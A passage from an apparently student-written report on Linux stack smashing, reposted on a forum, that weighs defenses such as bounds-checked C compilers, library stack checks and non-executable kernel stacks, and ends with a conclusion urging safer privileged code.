the integrity check fails, it would simply print a warning message and exit
the affected program.
The main disadvantage to this approach is that all dangerous functions
would suffer a significant performance penalty, and like the previous approach,
this modification does not take into account autonomous functions
defined by the programmer, because of its implementation in the system libraries.
An additional drawback to this approach is that the code necessary
in checking the stack must be written in assembler, and is thus not portable
to multiple architectures.
An extreme approach to solving the problem with the compiler involves implementing
bounds checking in the C programming language. Possibly the
most dangerous solution to the stack smashing problem, as this approach
violates C programming languageâ„¢s simplicity, efficiency, and flexibility devices.
One approach used in implementing this involves modifying the representation
of pointers in the language to include three items: the pointer
itself, and the lower and upper bounds of the pointerâ„¢s address space.
21
Chapter 5. Prevention and Security
By giving the compiler the additional upper and lower bound information,
it would then be trivial to do bounds checking before byte copy functions.
Despite this benefit, using this approach to implementing bounds checking
has the following disadvantages: execution time of resulting code increases
by a factor of ten or more[5], register allocation becomes more expensive by
a factor of 3:1, new versions of all compiled system libraries and system calls
must be provided, and code that interfaces with the hardware directly may
be completely incompatible or require special attention.
A unique approach to modifying the compiler in this manner involved modifying
the compiler to perform the same type of bounds checking, without
modifying the representation of pointers. Furthermore, there shall be options
to turn the bounds checking mode on or off in a given program.
Only one pointer is valid for a given region and one can check whether a
pointer arithmetic expression is valid by finding its base pointerâ„¢s storage
region. This is checked again to insure that the expressionâ„¢s result points to
the same storage region.
Despite semifavorable performance statistics, in addition to the general risk
involved at modifying the C language at this level, this modification involves
patching and recompiling the existing C compiler and its libraries. Furthermore,
all previously compiled binaries must be deleted and recompiled with
the new libraries. Once this is done, all binaries on the system will execute
with respect to this patch. In conclusion, modifying the C language or the C
compiler to limit stack smashing opportunities often involves modifying the
C language at a nontrivial level.
Additionally, the most complex and comprehensive solutions of this nature,
despite their long term centralization, still remain largely decentralized and
difficult to implement and test in a reasonable amount of time. The more
trivial modifications of this nature degenerate simply into compiler warning
messages that can only encourage the programmer to modify the program
manually.
CPU/OS kernel stack execution privilege
The most centralized approach in preventing some stack smashing vulnerabilities
involves modifying an operating systemâ„¢s kernel segment limit such
that it does not cover the actual stack space. This approach effectively removes
the kernelâ„¢s stack execution permission. This has a fundamental advantages
over other countermeasures. As the most centralized method in
limiting stack smashing vulnerabilities, no recompilation of C libraries or
the actual compiler would be necessary, only the operating system kernel
need be recompiled. A practical implementation of this concept on the Linux
operating system is described below, this description touches on the details
of implementation as well as some of the problems.
To remove stack execution privilege in Linux, the operating system
dynamic memory allocation stack of the operating system is marked as
nonexecutable.
Started under such a kernel would have its stack pages also marked nonexecutable.
Stack smashing exploits depend on an executable stack when
returning back into a memory address which executes an interactive shell.
By removing this functionality from the system, some stack smashing vulnerabilities
can be stopped.
Furthermore, signal handler returns in the Linux operating system require
an executable stack. Signal handlers are absolutely crucial in an operating
system, thus, a temporary executable stack for signal handlers must be implemented.
Thus, buffer overflows in signal handlers would still be possible
using this temporarily executable stack.
22
Chapter 5. Prevention and Security
By changing the kernel stack execution permissions, it would stop most
SUID buffer overflows, excluding those involving signal handlers. A system
with a nonexecutable stack also hinders LISP and Objective C development
efforts as well as other functional languages might also be affected. Furthermore,
every program contains code that performs fundamental operations
such as saving and restoring values from CPU registers, performs system
calls.
In contrast to the formulated stack smashing exploits available, an attack
such as this would be impossible to prevent by changing the stack execution
privilege. In other words, removing the stack execution permission only
prevents todayâ„¢s stack smashing exploits from working properly. As exploits
become more sophisticated, stack execution bits may have little or no relevance
in terms of the exploit. As an aside, this type of patch can also be
implemented in system CPU hardware.
New system architectures could simply have multiple stacks: one for call
frames, and one for automatic storage. In conclusion, by removing stack execution
from the system kernel, one can attempt to stop the stack smashing
problem at the source. However, this approach suffers in implementation because
the necessary code is nonportable, standard compiler functions and
operating system signal handling behavior is modified and may be unpredictable.
In addition to these points, this approach is not proven to stop
more sophisticated stack smashing exploits.
23
Chapter 5. Prevention and Security
24
Chapter 6. Conclusion
Stack smashing security exploits have become commonplace on Linux machines
as a means to gain access to privileged resources. By combining standard
operations and conditions of the Linux and C programming language,
based on this study, one can see how an unprivileged user can obtain privileged
user permissions. Furthermore, with the number of privileged programs
that exist in todayâ„¢s standard Linux distributions combined with the
fact that an overflow exploit could be constructed for any one or number of
these operating systems.
In spite of stack smashing prevalence, a number of things can be done to prevent
most stack smashing vulnerabilities. As the level of awareness of stack
smashing exploits increases, Linux vendors, programmers, system administrators
and users alike, are educating each other. System administrators can
implement various configuration methods to lower the possibilities of stack
smashing vulnerability exploits. Linux vendors can do their part by making a
commitment to be very cautious with privileged binaries installed by default
on their specific Linux distribution.
Lastly but perhaps the most effective solution can come from programmers
who write privileged code. As standards evolve and are accepted for coding
safer privileged programs and creating more secure operating systems, programmers
can develop more robust code which is less susceptible to stack
smashing. With the cooperation of many people in different parts of the Linux
community, stack smashing security vulnerabilities can be defeated.

Possibly Related Threads...
Thread		Author	Replies	Views	Last Post
	A Low-Power Delay Buffer Using Gated Driver Tree	seminar class	0	1,482	06-05-2011, 10:20 AM Last Post: seminar class

Important Note..!

ASK HERE